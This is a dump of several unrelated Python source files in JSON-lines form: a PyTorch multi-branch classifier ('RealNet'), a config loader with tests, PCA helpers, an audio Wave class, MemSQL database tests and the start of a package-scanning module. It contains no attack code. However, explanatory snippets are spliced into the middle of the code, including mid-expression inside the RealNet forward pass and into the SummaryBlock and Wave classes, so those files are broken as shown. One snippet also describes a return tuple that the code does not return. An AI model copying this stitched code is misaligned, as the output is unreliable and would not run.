down=False,\n trans='A', reduce=0.5, convkp='T', inmode='nearest', classify=0, nclass=1000,\n last_branch=1, last_down=False, last_expand=0):\n super(SingleCouple, self).__init__()\n assert last_branch <= 2, ' of SingleCouple should be <= 2...'\n self.indepth = indepth\n self.growth = growth\n self.active = getattr(nn.functional, active)\n self.first = first\n self.after = after\n self.down = down\n self.trans = trans\n self.reduce = reduce\n self.trans_func = self._trans[trans]\n self.classify = classify\n self.nclass = nclass\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.inmode = inmode\n self.convkp = convkp\n kp = {'T': (3, 1), 'O': (1, 0)}[convkp]\n\n first_outdepth = indepth + growth if self.first else growth\n self.bn1 = nn.BatchNorm2d(indepth)\n self.conv1 = nn.Conv2d(indepth, first_outdepth, 3, stride=2, padding=1, bias=False, dilation=1)\n self.bn2 = nn.BatchNorm2d(indepth + growth)\n self.conv2 = nn.Conv2d(indepth + growth, growth, kp[0], stride=1, padding=kp[1], bias=False, dilation=1)\n\n if self.classify > 0:\n self.classifier = nn.Sequential(\n nn.BatchNorm2d(indepth + growth),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(dim=-1),\n nn.Linear(indepth + growth, nclass)\n )\n if self.after:\n if self.down:\n outdepth = int(math.floor((indepth + growth) * reduce))\n self.down_res2 = self.trans_func(indepth + growth, outdepth)\n self.down_res1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.last_down:\n outdepth = indepth + growth + last_expand\n if self.last_branch >= 1:\n self.down_last2 = self.trans_func(indepth + growth, outdepth)\n if self.last_branch >= 2:\n self.down_last1 = self.trans_func(indepth + growth, outdepth)\n else:\n if self.classify > 0 and self.last_branch == 2:\n # 此时,最后一个Couple的中间层被当做branch输出而对接在Summary上.\n # 因此,删除此Couple自带的Classifier,以免与Summary中的Classifier重复.\n delattr(self, 'classifier')\n self.classify = 0\n print('Note: 1 xfc will be deleted because of duplicate with the last-fc!')\n\n def forward(self, x):\n if isinstance(x, (list, tuple)):\n x1, x2, x3, x4, pred = x # 大 中 小 中\n else:\n x1, x2, x3, x4, pred = x, None, None, None, None\n res1 = self.conv1(self.active(self.bn1(x1)))\n res1 = torch.cat((res1, x2), 1) if not self.first else res1\n out = res1\n res2 = self.conv2(self.active(self.bn2(polate(res1, scale_factor=2, 
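Each couple returns a (res4, res3, res2, res1, pred) tuple and accepts either a raw tensor or its predecessor's tuple, which is what lets a plain nn.Sequential chain them. A toy reduction of that convention (the block body is a stand-in, not the real couple):

import torch
import torch.nn as nn

class TupleBlock(nn.Module):
    def forward(self, x):
        if isinstance(x, (list, tuple)):
            x1, x2, x3, x4, pred = x
        else:  # first block in the chain receives a bare tensor
            x1, x2, x3, x4, pred = x, None, None, None, []
        pred.append(None)  # stands in for an optional aux prediction
        return x1, x2, x3, x4, pred

stage = nn.Sequential(TupleBlock(), TupleBlock())
out = stage(torch.randn(2, 3, 8, 8))
print(len(out), len(out[-1]))  # 5-tuple out, 2 aux slots collected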
mode=self.inmode))))\n res2 = torch.cat((res2, x1), 1)\n\n if self.classify > 0:\n out = self.classifier(out)\n else:\n out = None\n pred.append(out)\n\n if self.after:\n if self.down:\n res2 = self.down_res2(res2)\n res1 = self.down_res1(res1)\n return res2, res1, None, None, pred\n else:\n if self.last_branch == 1:\n if self.last_down:\n res2 = self.down_last2(res2)\n return res2, pred\n elif self.last_branch == 2:\n if self.last_down:\n res2 = self.down_last2(res2)\n res1 = self.down_last1(res1)\n return res2, res1, pred\n else:\n raise ValueError(' of SingleCouple should be <= 2!')\n\n\nclass SummaryBlock(nn.Module):\n METHOD = ['split', 'merge']\n\n def __init__(self, indepth, branch=1, active='relu', nclass=1000, method='split'):\n super(SummaryBlock, self).__init__()\n assert len(indepth) == branch, '各分类分支的通道数必须全部给定,so, len of == branch.'\n assert method in self.METHOD, 'Unknown %s for SummaryBlock.' % method\n self.indepth = indepth\n self.branch = branch\n self.active = active\n self.nclass = nclass\n self.method = method\n self.active_fc = True\n\n if method == 'split':\n for i in range(branch):\n fc_layer = nn.Sequential(\n nn.BatchNorm2d(indepth[i]),\n Activate(active),\n AdaAvgPool(),\n ViewLayer(),\n nn.Linear(indepth[i], nclass))\n setattr(self, 'classifier%s' % (i + 1), fc_layer)\n elif method == 'merge':\n for i in range(branch):\n view_layer = nn.Sequential(\n nn.BatchNorm2d(indepth[i]),\n Activate(active),\n AdaAvgPool(),\n ViewLayer())\n setattr(self, 'pool_view%s' % (i + 1), view_layer)\n self.classifier = nn.Linear(sum(indepth), nclass)\n else:\n raise NotImplementedError\n\n def forward(self, x):\n # x1, x2, x3, x4 extracted form x is \"big, media, small, media\" respectively.\n # 为确保fc(xi)的顺序与layer_i在model内的顺序相一致和相对应,\n # so the output order should be [fc(x4), fc(x3), fc(x2), fc(x1)] or [fc([x4, x3, x2, x1])]\n if not self.active_fc:\n return x\n assert isinstance(x, (tuple, list)), 'x must be tuple, but %s' % type(x)\n assert len(x) == self.branch + 1, 'pred should be input together with x'\n x, pred = x[:self.branch], x[-1]\n if self.method == 'split':\n xx = []\n for i, xi in enumerate(x):\n xi = getattr(self, 'classifier%s' % (i + 1))(xi)\n xx.append(xi)\n pred.extend(xx[::-1])\n elif self.method == 'merge':\n x = [getattr(self, 'pool_view%s' % (i + 1))(xi) for i, xi in enumerate(x)]\n x = torch.cat(x[::-1], dim=1)\n x = self.classifier(x)\n pred.append(x)\n return pred\n\n\nclass RealNet(nn.Module):\n _couple = {'D': DoubleCouple, 'S': SingleCouple}\n _rocker = {'X': RockBlockX, 'Q': RockBlockQ, 'O': RockBlockO}\n\n def __init__(self, stages=4, rock='O', branch=4, indepth=16, growth=12, multiway=4,\n layers=(3, 3, 3, 3), blocks=('D', 'D', 'D', 'D'), classify=(0, 0, 0, 0),\n trans=('A', 'A', 'A', 'A'), reduction=(0.5, 0.5, 0.5, 0.5), convkp=('T', 'T', 'T', 'O'),\n last_branch=4, last_down=False, last_expand=0, poolmode='avg', active='relu',\n summer='split', nclass=1000, inmode='nearest'):\n super(RealNet, self).__init__()\n assert stages <= min(len(layers), len(blocks), len(classify), len(trans),\n len(reduction), len(convkp)), \\\n 'Hyper Pameter Not Enough to Match Stages Nums:%s!' % stages\n assert stages == sum([bool(l) for l in layers[:stages]]), \\\n 'Hyper Pameter and cannot match, ' \\\n 'number of no-zero value in should be == !' % (stages, layers)\n assert stages == sum([bool(r) for r in reduction[:stages - 1]]) + 1, \\\n 'Hyper Pameter and cannot match, ' \\\n 'number of no-zero value in should be == !' 
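SummaryBlock's two policies differ only in where pooling meets classification: 'split' attaches one linear head per branch, 'merge' concatenates the pooled branches into a single head. A self-contained sketch with made-up channel counts:

import torch
import torch.nn as nn

feats = [torch.randn(4, 32, 8, 8), torch.randn(4, 32, 4, 4)]  # two branches
pool = nn.AdaptiveAvgPool2d(1)

# 'split': one classifier per branch -> a list of predictions
heads = [nn.Linear(32, 10) for _ in feats]
split_preds = [h(pool(f).flatten(1)) for h, f in zip(heads, feats)]

# 'merge': concatenate pooled branches -> a single prediction
merged = torch.cat([pool(f).flatten(1) for f in feats], dim=1)
merge_pred = nn.Linear(64, 10)(merged)
print([p.shape for p in split_preds], merge_pred.shape)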
% (stages, reduction)\n assert sorted(blocks[:stages]) == list(blocks[:stages]), \\\n 'DoubleCouple must be ahead of SingleCouple! But your %s' % 'is ->'.join(blocks[:stages])\n assert (blocks[0] == 'D' and branch == 3) or (blocks[0] == 'S' and branch == 2), \\\n 'DoubleCouple need ==3, SingleCouple need ==2, ' \\\n 'but your %s is %s' % (blocks[0], branch)\n assert len(convkp) == sum([1 for k in convkp if k in ['T', 'O']]), \\\n 'Hyper Pameter only can contain T or O.' % (convkp,)\n assert multiway in [3, 4], ' of dense connections now only support [3 or 4]!'\n\n dataset = ['imagenet', 'cifar'][nclass != 1000]\n if dataset == 'cifar':\n assert stages <= 4, 'cifar stages should <= 4'\n elif dataset == 'imagenet':\n assert stages <= 5, 'imagenet stages should <= 5'\n\n self.stages = stages\n self.rock = self._rocker[rock]\n self.branch = branch\n self.indepth = indepth\n self.growth = growth\n self.multiway = multiway\n self.layers = layers\n self.classify = classify\n self.trans = trans\n self.reduction = reduction\n self.convkp = convkp\n self.poolmode = poolmode\n self.active = active\n self.last_branch = last_branch\n self.last_down = last_down\n self.last_expand = last_expand\n self.nclass = nclass\n self.inmode = inmode\n\n self.after = [True for _ in range(stages - 1)] + [False]\n self.layer0 = self.rock(indepth=3, outdepth=indepth, branch=branch, dataset=dataset)\n for i in range(stages):\n dense_stage = self._make_dense_stage(self._couple[blocks[i]], layers[i], indepth, growth,\n classify[i], self.after[i], trans[i], reduction[i],\n convkp[i], last_branch, last_down, last_expand, i)\n setattr(self, 'dense%s' % (i + 1), dense_stage)\n indepth += layers[i] * growth\n if i < stages - 1:\n indepth = int(math.floor(indepth * reduction[i]))\n elif i == stages - 1:\n indepth = indepth + last_expand if last_down else indepth # + growth\n\n indepth = [indepth] * last_branch\n self.summary = SummaryBlock(indepth, last_branch, active, nclass=nclass, method=summer)\n\n def _make_dense_stage(self, block, nums, indepth, growth, cfy, after, trans, reduce, convkp,\n last_branch, last_down, last_expand, stage):\n layers = []\n for i in range(nums - 1):\n if self.multiway == 3:\n first = True # 固定所有block内第1个conv1层的outdepth\n elif self.multiway == 4:\n first = bool(stage == 0 and i == 0) # 固定第1个block内的第1个conv1层的outdepth\n layers.append(block(indepth=indepth, growth=growth, active=self.active, first=first,\n after=True, down=False, trans=trans, reduce=reduce, convkp=convkp,\n classify=cfy, nclass=self.nclass, inmode=self.inmode,\n last_branch=last_branch, last_down=last_down, last_expand=last_expand))\n indepth += growth\n\n if self.multiway == 3:\n first = True\n elif self.multiway == 4:\n if stage == 0 and nums == 1: first = True # 第1个stage的第1个block\n if stage == 0 and nums > 1: first = False # 第1个stage的第2+个block\n if stage > 0: first = False # 第2+个stage内的blocks\n layers.append(block(indepth=indepth, growth=growth, active=self.active, first=first,\n after=after, down=True, trans=trans, reduce=reduce, convkp=convkp,\n classify=cfy, nclass=self.nclass, inmode=self.inmode,\n last_branch=last_branch, last_down=last_down, last_expand=last_expand))\n return nn.Sequential(*layers)\n\n def forward(self, x):\n x = self.layer0(x)\n for i in range(self.stages):\n x = getattr(self, 'dense%s' % (i + 1))(x)\n # utils.print_size(x, True)\n x = self.summary(x) # x <=> [x, pred]\n x = [p for p in x if p is not None]\n return x\n\n def forward2(self, x):\n # deprecated !!!!\n ok = False\n x = self.layer0(x)\n 
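The stage-width arithmetic in RealNet.__init__ (grow by layers[i]*growth, then shrink by reduction[i] between stages) can be checked by hand; here it is traced with the cifar `exp3` hyperparameters quoted further down in this file:

import math

indepth, growth = 24, 12
layers, reduction = (4, 3, 2), (0.5, 0.5, 0)
for i, n in enumerate(layers):
    indepth += n * growth                                  # dense growth per stage
    if i < len(layers) - 1:
        indepth = int(math.floor(indepth * reduction[i]))  # transition shrink
print(indepth)  # 60 channels entering the summary (last_down=False here)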
xtils.print_size(x, ok)\n x = self.dense1(x)\n xtils.print_size(x, ok)\n x = self.trans1(x)\n xtils.print_size(x, ok)\n x = self.dense2(x)\n xtils.print_size(x, ok)\n x = self.trans2(x)\n xtils.print_size(x, ok)\n x = self.dense3(x)\n xtils.print_size(x, ok)\n x = self.trans3(x)\n xtils.print_size(x, ok)\n x = self.dense4(x)\n xtils.print_size(x, ok)\n if self.last_trans:\n x = self.trans4(x)\n xtils.print_size(x, ok)\n x = self.summary(x)\n x = [p for p in x if p is not None]\n return x\n\n\nif __name__ == '__main__':\n import xtils\n\n torch.manual_seed(9528)\n\n # # imagenet\n # exp = {'stages': 4, 'rock': 'Q', 'branch': 3, 'indepth': 5, 'growth': 3, 'multiway': 4,\n # 'layers': (6, 5, 4, 3), 'blocks': ('D', 'D', 'D', 'S'), 'classify': (1, 1, 1, 1),\n # 'trans': ('A', 'A', 'A', 'A'), 'reduction': (0.5, 0.5, 0.5, 0.5), 'convkp': ('T', 'T', 'T', 'O'),\n # 'last_branch': 2, 'last_down': False, 'last_expand': 10, 'inmode': 'nearest',\n # 'poolmode': 'avg', 'active': 'relu', 'summer': 'merge', 'nclass': 1000}\n #\n # model = RealNet(**exp)\n # print(model)\n # x = torch.randn(4, 3, 256, 256)\n # # utils.tensorboard_add_model(model, x)\n # utils.calculate_params_scale(model, format='million')\n # utils.calculate_layers_num(model, layers=('conv2d', 'deconv2d', 'fc'))\n # y = model(x)\n # print('共有dense blocks数:', sum(model.layers), '最后实际输出分类头数:', len(y),)\n # print('每个输出预测的尺寸:', [(yy.shape,) for yy in y if yy is not None])\n # print('每个输出预测的得分:', [(yy.max(1),) for yy in y if yy is not None])\n\n # cifar\n exp2 = {'stages': 2, 'rock': 'O', 'branch': 3, 'indepth': 24, 'growth': 12, 'multiway': 4,\n 'layers': (7, 1, 0), 'blocks': ('D', 'D', '-'), 'classify': (0, 0, 0),\n 'trans': ('A', 'A', '-'), 'reduction': (0.5, 0, 0), 'convkp': ('T', 'T', 'T', 'O'),\n 'last_branch': 1, 'last_down': True, 'last_expand': 0, 'inmode': 'nearest',\n 'poolmode': 'avg', 'active': 'relu', 'summer': 'split', 'nclass': 10}\n\n exp3 = {'stages': 3, 'rock': 'O', 'branch': 3, 'indepth': 24, 'growth': 12, 'multiway': 4,\n 'layers': (4, 3, 2), 'blocks': ('D', 'D', 'D'), 'classify': (1, 1, 1),\n 'trans': ('A', 'A', 'A'), 'reduction': (0.5, 0.5, 0), 'convkp': ('T', 'T', 'T', 'T'),\n 'last_branch': 1, 'last_down': False, 'last_expand': 10, 'inmode': 'nearest',\n 'poolmode': 'avg', 'active': 'relu', 'summer': 'split', 'nclass': 10}\n\n model = RealNet(**exp3)\n print(model)\n x = torch.randn(4, 3, 32, 32)\n # utils.tensorboard_add_model(model, x)\n xtils.calculate_params_scale(model, format='million')\n xtils.calculate_layers_num(model, layers=('conv2d', 'deconv2d', 'fc'))\n y = model(x)\n print('共有dense blocks数:', sum(model.layers), '最后实际输出分类头数:', len(y), )\n print('每个输出预测的尺寸:', [(yy.shape,) for yy in y if yy is not None])\n print('每个输出预测的得分:', [(yy.max(1),) for yy in y if yy is not None])\n\n","sub_path":"xmodels/realnet.py","file_name":"realnet.py","file_ext":"py","file_size_in_byte":21669,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"611092004","text":"# Created by aviade \n# Time: 09/05/2016 17:31\n\n__author__ = 'dana'\nimport configparser\nimport sys\nimport logging\nfrom commons.commons import * #common and builtin functions can be used in config values\n__config =None\n__config_file = None\n\ndef getConfig():\n \"\"\"\n @description: config file given as the first commnand line param.\n :return: config instance\n \"\"\"\n global __config, __config_file\n if __config and __config_file==sys.argv[1]:\n return __config\n else:\n try:\n __config_file = sys.argv[1]\n 
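The config loader that follows monkey-patches an eval helper onto ConfigParser so .ini values can hold Python expressions. A reduced sketch of that idiom, with the file contents inlined for the demo:

import configparser

cfg = configparser.ConfigParser()
cfg.read_string("[DEFAULT]\nstart_date = 1 + 2\n")   # value is a Python expression
cfg.eval = lambda sec, key: eval(cfg.get(sec, key))  # same monkey-patch as getConfig
print(cfg.eval("DEFAULT", "start_date"))             # 3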
logging.info(\"config file %s\"%__config_file)\n __config = configparser.ConfigParser()\n __config.read(__config_file, encoding=\"utf8\")\n __config.eval = lambda sec,key: eval(__config.get(sec,key))\n __config.getfilename = lambda: __config_file\n return __config\n except:\n logging.exception( \"Usage: %s \" , (sys.argv[0]))\n exit(-1)\n\n\n\n########################################################################\nimport unittest\nclass TestConfig(unittest.TestCase):\n def setUp(self):\n import sys;sys.argv = [sys.argv[0], 'config_test_offline.ini']\n self._config= getConfig()\n\n def tearDown(self):\n pass\n\n def testDefaultValue(self):\n self.assertEqual(self._config.get(\"DB\",\"start_date\"), \"date('2015-04-01 00:00:00')\")\n\n def testAccessDefault(self):\n self.assertEqual(self._config.get(\"DEFAULT\",\"start_date\"), \"date('2015-04-01 00:00:00')\")\n\n def testEval(self):\n import datetime\n self.assertEqual(self._config.eval(\"DEFAULT\",\"start_date\"), datetime.datetime.strptime('2015-04-01 00:00:00',\"%Y-%m-%d %H:%M:%S\"))\n\nif __name__ == \"__main__\":\n unittest.main()\n\n","sub_path":"configuration/config_class.py","file_name":"config_class.py","file_ext":"py","file_size_in_byte":1781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"633404219","text":"import torch\n\ndef get_covariance_matrix(X):\n '''\n Returns the covariance of the data X\n X should contain a single data point per row of the tensor\n '''\n X_mean = torch.mean(X, dim=0)\n X_mean_matrix = torch.outer(X_mean, X_mean)\n X_corr_matrix = torch.matmul(torch.transpose(X, 0, 1), X)/X.size(0)\n cov = X_corr_matrix - X_mean_matrix\n return cov\n\ndef get_e_v(cov):\n '''\n Returns eigenvalues and eigenvectors in descending order by eigenvalue size\n '''\n e, v = torch.symeig(cov, eigenvectors=True)\n v = torch.transpose(v, 0, 1)\n e_abs = torch.abs(e)\n\n inds = torch.argsort(e_abs, descending=True)\n e = e_abs[inds]\n v = v[inds]\n\n return e,v\n","sub_path":"pca_tools.py","file_name":"pca_tools.py","file_ext":"py","file_size_in_byte":696,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"200785851","text":"import copy\nimport enum\nimport warnings\nfrom enum import auto\nfrom typing import Union, List\n\nimport numpy as np\n\nimport corrscope.utils.scipy.wavfile as wavfile\nfrom corrscope.config import CorrError, CorrWarning, TypedEnumDump\n\nFLOAT = np.single\n\n\n@enum.unique\nclass Flatten(TypedEnumDump):\n \"\"\" How to flatten a stereo signal. 
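get_covariance_matrix computes the biased covariance E[xxᵀ] − E[x]E[x]ᵀ; a quick numerical cross-check against numpy (my own, not part of the module — note also that torch.symeig, used in get_e_v, has since been deprecated in favour of torch.linalg.eigh):

import numpy as np
import torch

X = torch.randn(100, 5)
X_mean = X.mean(dim=0)
cov = X.T @ X / X.size(0) - torch.outer(X_mean, X_mean)  # E[xx^T] - E[x]E[x]^T
ref = np.cov(X.numpy(), rowvar=False, bias=True)         # biased covariance
print(np.allclose(cov.numpy(), ref, atol=1e-5))          # True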
(Channels beyond first 2 are ignored.)\n\n Flatten(0) == Flatten.Stereo == Flatten['Stereo']\n \"\"\"\n\n # Keep both channels.\n Stereo = 0\n\n # Mono\n Mono = auto() # NOT publicly exposed\n\n # Take sum or difference.\n SumAvg = auto()\n DiffAvg = auto()\n\n modes: List[\"Flatten\"]\n\n\n_rejected_modes = {Flatten.Mono}\nFlatten.modes = [f for f in Flatten.__members__.values() if f not in _rejected_modes]\n\n\nclass Wave:\n __slots__ = \"\"\"\n wave_path\n amplification\n smp_s data return_channels _flatten is_mono\n nsamp dtype\n center max_val\n \"\"\".split()\n\n smp_s: int\n data: \"np.ndarray\"\n \"\"\"2-D array of shape (nsamp, nchan)\"\"\"\n\n _flatten: Flatten\n\n @property\n def flatten(self) -> Flatten:\n \"\"\"\n If data is stereo:\n - flatten can be Stereo (2D) or Sum/Diff(Avg) (1D).\n\n If data is mono:\n - flatten can be Stereo (2D) or Mono (1D).\n - If flatten != Stereo, set flatten = Mono.\n \"\"\"\n return self._flatten\n\n @flatten.setter\n def flatten(self, flatten: Flatten) -> None:\n # Reject invalid modes (including Mono).\n if flatten not in Flatten.modes: # type: ignore\n # Flatten.Mono not in Flatten.modes.\n raise CorrError(\n f\"Wave {self.wave_path} has invalid flatten mode {flatten} \"\n f\"not in {Flatten.modes}\"\n )\n\n # If self.is_mono, converts all non-Stereo modes to Mono.\n self._flatten = flatten\n if self.is_mono and flatten != Flatten.Stereo:\n self._flatten = Flatten.Mono\n\n def __init__(\n self,\n wave_path: str,\n amplification: float = 1.0,\n flatten: Flatten = Flatten.SumAvg,\n ):\n self.wave_path = wave_path\n self.amplification = amplification\n self.smp_s, self.data = wavfile.read(wave_path, mmap=True)\n\n assert self.data.ndim in [1, 2]\n self.is_mono = self.data.ndim == 1\n self.flatten = flatten\n self.return_channels = False\n\n # Cast self.data to stereo (nsamp, nchan)\n if self.is_mono:\n self.data.shape = (-1, 1)\n\n self.nsamp, stereo_nchan = self.data.shape\n if stereo_nchan > 2:\n warnings.warn(\n f\"File {wave_path} has {stereo_nchan} channels, \"\n f\"only first 2 will be used\",\n CorrWarning,\n )\n\n dtype = self.data.dtype\n\n # Calculate scaling factor.\n def is_type(parent: type) -> bool:\n return np.issubdtype(dtype, parent)\n\n # Numpy types: https://docs.scipy.org/doc/numpy/reference/arrays.scalars.html\n if is_type(np.integer):\n max_int = np.iinfo(dtype).max + 1\n assert max_int & (max_int - 1) == 0 # power of 2\n\n if is_type(np.unsignedinteger):\n self.center = max_int // 2\n self.max_val = max_int // 2\n\n elif is_type(np.signedinteger):\n self.center = 0\n self.max_val = max_int\n\n elif is_type(np.floating):\n self.center = 0\n self.max_val = 1\n\n else:\n raise CorrError(f\"unexpected wavfile dtype {dtype}\")\n\n def with_flatten(self, flatten: Flatten, return_channels: bool) -> \"Wave\":\n new = copy.copy(self)\n new.flatten = flatten\n new.return_channels = return_channels\n return new\n\n def __getitem__(self, index: Union[int, slice]) -> np.ndarray:\n \"\"\" Copies self.data[item], converted to a FLOAT within range [-1, 1). 
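Wave derives its normalisation constants purely from the sample dtype: signed integers are already centred at zero, unsigned ones sit at half the range, and floats are assumed to lie in [-1, 1) already. The same mapping, extracted into a standalone check:

import numpy as np

for dtype in (np.int16, np.uint8, np.float32):
    if np.issubdtype(dtype, np.integer):
        max_int = np.iinfo(dtype).max + 1                 # power of two
        if np.issubdtype(dtype, np.unsignedinteger):
            center, max_val = max_int // 2, max_int // 2  # e.g. uint8 -> 128, 128
        else:
            center, max_val = 0, max_int                  # e.g. int16 -> 0, 32768
    else:
        center, max_val = 0, 1                            # floats pass through
    print(dtype.__name__, center, max_val)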
\"\"\"\n # subok=False converts data from memmap (slow) to ndarray (faster).\n data: np.ndarray = self.data[index].astype(FLOAT, subok=False, copy=True)\n\n # Flatten stereo to mono.\n flatten = self._flatten # Potentially faster than property getter.\n if flatten == Flatten.Mono:\n data = data.reshape(-1) # ndarray.flatten() creates copy, is slow.\n elif flatten != Flatten.Stereo:\n # data.strides = (4,), so data == contiguous float32\n if flatten == Flatten.SumAvg:\n data = data[..., 0] + data[..., 1]\n else:\n data = data[..., 0] - data[..., 1]\n data /= 2\n\n data -= self.center\n data *= self.amplification / self.max_val\n\n if self.return_channels and len(data.shape) == 1:\n data = data.reshape(-1, 1)\n return data\n\n def _get(self, begin: int, end: int, subsampling: int) -> np.ndarray:\n \"\"\" Copies self.data[begin:end] with zero-padding. \"\"\"\n if 0 <= begin and end <= self.nsamp:\n return self[begin:end:subsampling]\n\n region_len = end - begin\n\n def constrain(idx: int) -> int:\n delta = 0\n if idx < 0:\n delta = 0 - idx # delta > 0\n assert idx + delta == 0\n\n if idx > self.nsamp:\n delta = self.nsamp - idx # delta < 0\n assert idx + delta == self.nsamp\n\n return delta\n\n begin_index = constrain(begin)\n end_index = region_len + constrain(end)\n del end\n data = self[begin + begin_index : begin + end_index : subsampling]\n\n # Compute subsampled output ranges\n out_len = region_len // subsampling\n out_begin = begin_index // subsampling\n out_end = out_begin + len(data)\n # len(data) == ceil((end_index - begin_index) / subsampling)\n\n out = np.zeros((out_len, *data.shape[1:]), dtype=FLOAT)\n\n out[out_begin:out_end] = data\n\n return out\n\n def get_around(self, sample: int, return_nsamp: int, stride: int) -> np.ndarray:\n \"\"\" Returns `return_nsamp` samples, centered around `sample`,\n sampled with spacing `stride`.\n\n Copies self.data[...] 
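_get promises that reads spilling past either end of the wave come back zero-padded to the requested window. A toy model of that guarantee (mine, not the class's, and without the subsampling step):

import numpy as np

data = np.arange(1, 6, dtype=np.float32)  # pretend 5-sample wave

def padded_get(begin, end):
    out = np.zeros(end - begin, dtype=np.float32)
    lo, hi = max(begin, 0), min(end, len(data))
    out[lo - begin:hi - begin] = data[lo:hi]
    return out

print(padded_get(-2, 3))  # [0. 0. 1. 2. 3.]
print(padded_get(3, 8))   # [4. 5. 0. 0. 0.]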
\"\"\"\n distance = return_nsamp * stride\n end = sample + distance // 2\n begin = end - distance\n return self._get(begin, end, stride)\n\n def get_s(self) -> float:\n \"\"\"\n :return: time (seconds)\n \"\"\"\n return self.nsamp / self.smp_s\n","sub_path":"corrscope/wave.py","file_name":"wave.py","file_ext":"py","file_size_in_byte":6432,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"640249007","text":"import pytest\nfrom memsql.common import database\n\ndef test_connection_open(test_db_conn):\n assert test_db_conn.connected()\n\ndef test_connection_close(test_db_conn):\n assert test_db_conn.connected()\n test_db_conn.close()\n assert not test_db_conn.connected()\n\ndef test_reconnect(test_db_conn):\n assert test_db_conn.connected()\n db_instance = test_db_conn._db\n test_db_conn.reconnect()\n assert test_db_conn.connected()\n assert db_instance != test_db_conn._db\n\ndef test_query(test_db_conn):\n # select result\n res = test_db_conn.query('select 1')\n assert len(res) == 1\n assert res[0]['1'] == 1\n\ndef test_ping(test_db_conn):\n test_db_conn.ping()\n\nclass TestQueries(object):\n @pytest.fixture(scope=\"class\")\n def x_conn(self, request, test_db_args, test_db_database):\n conn = database.connect(**test_db_args)\n conn.execute('CREATE DATABASE IF NOT EXISTS %s' % test_db_database)\n conn.execute('USE %s' % test_db_database)\n\n def cleanup():\n conn.execute('DROP DATABASE %s' % test_db_database)\n request.addfinalizer(cleanup)\n\n return conn\n\n @pytest.fixture(scope=\"class\", autouse=True)\n def ensure_schema(self, x_conn, request):\n x_conn.execute('DROP TABLE IF EXISTS x')\n x_conn.execute('CREATE TABLE x (id BIGINT AUTO_INCREMENT PRIMARY KEY, value INT)')\n\n @pytest.fixture(autouse=True)\n def ensure_empty(self, x_conn, request):\n cleanup = lambda: x_conn.execute('DELETE FROM x')\n cleanup()\n request.addfinalizer(cleanup)\n\n def test_insert(self, x_conn):\n res = x_conn.query('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n assert res == 1 # 1 affected row\n\n res = x_conn.execute('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n\n res = x_conn.execute_lastrowid('INSERT INTO x (value) VALUES(1)')\n assert isinstance(res, long)\n last_row = x_conn.get('SELECT * FROM x ORDER BY id DESC LIMIT 1')\n assert res == last_row.id\n\n def test_select(self, x_conn):\n x_conn.execute('INSERT INTO x (value) VALUES (1), (2), (3)')\n\n all_rows = x_conn.query('SELECT * FROM x ORDER BY value ASC')\n assert len(all_rows) == 3\n assert all_rows[1].value == 2\n\n first_row = x_conn.get('SELECT * FROM x ORDER BY id LIMIT 1')\n assert first_row.value == 1\n\n def test_queryparams(self, x_conn):\n x_conn.execute('INSERT INTO x (value) VALUES (1), (2), (3)')\n\n rows = x_conn.query('SELECT * FROM x WHERE value > %s AND value < %s', 1, 3)\n\n assert len(rows) == 1\n assert rows[0].value == 2\n","sub_path":"memsql/common/test/test_database_adapters.py","file_name":"test_database_adapters.py","file_ext":"py","file_size_in_byte":2674,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"499530519","text":"\"\"\"\nHandles scanning through the zip packages to find all items, styles, etc.\n\"\"\"\nfrom __future__ import annotations\nimport os\nfrom collections import defaultdict\nimport attr\n\nimport srctools\nfrom app import tkMarkdown, img\nimport utils\nimport consts\nfrom app.packageMan import PACK_CONFIG\nfrom srctools import Property, NoKeyError\nfrom 
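get_around's window arithmetic, traced with illustrative numbers — return_nsamp strided samples centred on sample:

sample, return_nsamp, stride = 1000, 4, 3
distance = return_nsamp * stride
end = sample + distance // 2
begin = end - distance
print(begin, end, list(range(begin, end, stride)))  # 994 1006 [994, 997, 1000, 1003]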
srctools.tokenizer import TokenSyntaxError\nfrom srctools.filesys import FileSystem, RawFileSystem, ZipFileSystem, VPKFileSystem\nfrom editoritems import Item as EditorItem, Renderable, RenderableType\nimport srctools.logger\n\nfrom typing import (\n NoReturn, ClassVar, Optional, Any, TYPE_CHECKING, TypeVar, Type,\n Collection, Iterable, Mapping,\n)\nif TYPE_CHECKING: # Prevent circular import\n from app.gameMan import Game\n from loadScreen import LoadScreen\n\n\nLOGGER = srctools.logger.get_logger(__name__, alias='packages')\n\nall_obj: dict[Type[PakObject], dict[str, ObjData]] = {}\npackages: dict[str, Package] = {}\nOBJ_TYPES: dict[str, Type[PakObject]] = {}\n\n# Maps a package ID to the matching filesystem for reading files easily.\nPACKAGE_SYS: dict[str, FileSystem] = {}\n\n\n@attr.define\nclass SelitemData:\n \"\"\"Options which are displayed on the selector window.\"\"\"\n name: str # Longer full name.\n short_name: str # Shorter name for the icon.\n auth: list[str] # List of authors.\n icon: Optional[img.Handle] # Small square icon.\n large_icon: Optional[img.Handle] # Larger, landscape icon.\n desc: tkMarkdown.MarkdownData\n group: Optional[str]\n sort_key: str\n\n @classmethod\n def parse(cls, info: Property, pack_id: str) -> SelitemData:\n \"\"\"Parse from a property block.\"\"\"\n auth = sep_values(info['authors', ''])\n short_name = info['shortName', None]\n name = info['name']\n group = info['group', '']\n sort_key = info['sort_key', '']\n desc = desc_parse(info, info['id'], pack_id)\n if not group:\n group = None\n if not short_name:\n short_name = name\n\n try:\n icon = img.Handle.parse(\n info.find_key('icon'),\n pack_id,\n consts.SEL_ICON_SIZE, consts.SEL_ICON_SIZE,\n )\n except LookupError:\n icon = None\n try:\n large_icon = img.Handle.parse(\n info.find_key('iconlarge'),\n pack_id,\n *consts.SEL_ICON_SIZE_LRG,\n )\n except LookupError:\n large_icon = None\n\n return cls(\n name,\n short_name,\n auth,\n icon,\n large_icon,\n desc,\n group,\n sort_key,\n )\n\n def __add__(self, other: 